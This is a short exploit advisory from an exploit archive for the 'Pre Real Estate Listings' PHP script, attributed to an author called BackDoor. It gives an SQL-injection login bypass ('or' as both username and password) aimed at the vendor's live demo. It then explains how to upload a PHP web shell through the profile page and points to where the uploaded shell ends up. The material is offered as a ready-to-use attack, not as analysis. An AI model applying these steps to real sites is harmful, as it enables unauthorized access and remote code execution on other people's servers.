id: 4158
date: 11/11/2008
title: Pre Real Estate Listings File Upload Vulnerability
author: BackDoor
cves: 

==================================================
Pre Real Estate Listings File Upload Vulnerability
==================================================


Pre Real Estate Listings (login.php) ByPass /File Upload
Script:Pre Real Estate Listings
HomePage:http://preproject.com/
Demo:http://preproject.com/ulisting/
Author:BackDoor
By Pass Exploit:
http://victim.com/scriptpath/login.php username:'or' password:'or'
Live Demo:
http://preproject.com/ulisting/login.php
File Upload Exploit:
login live demo username:'or' password:'or'
Edit Your Profile Link:http://preproject.com/ulisting/profile.php
Upload Your Shell:
Example:
http://preproject.com/ulisting/re_images/1221553817_logo_wp.php
 
Cyber-Security TIM //Lojistik



#  0day.today [2023-03-26]  #